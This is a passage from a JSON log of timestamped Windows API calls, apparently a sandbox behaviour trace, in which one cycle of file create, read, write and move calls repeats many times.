"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,516", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,566", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,566", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,616", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,656", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,656", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,666", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,676", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,676", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,686", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,696", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,716", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,726", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,736", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,746", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 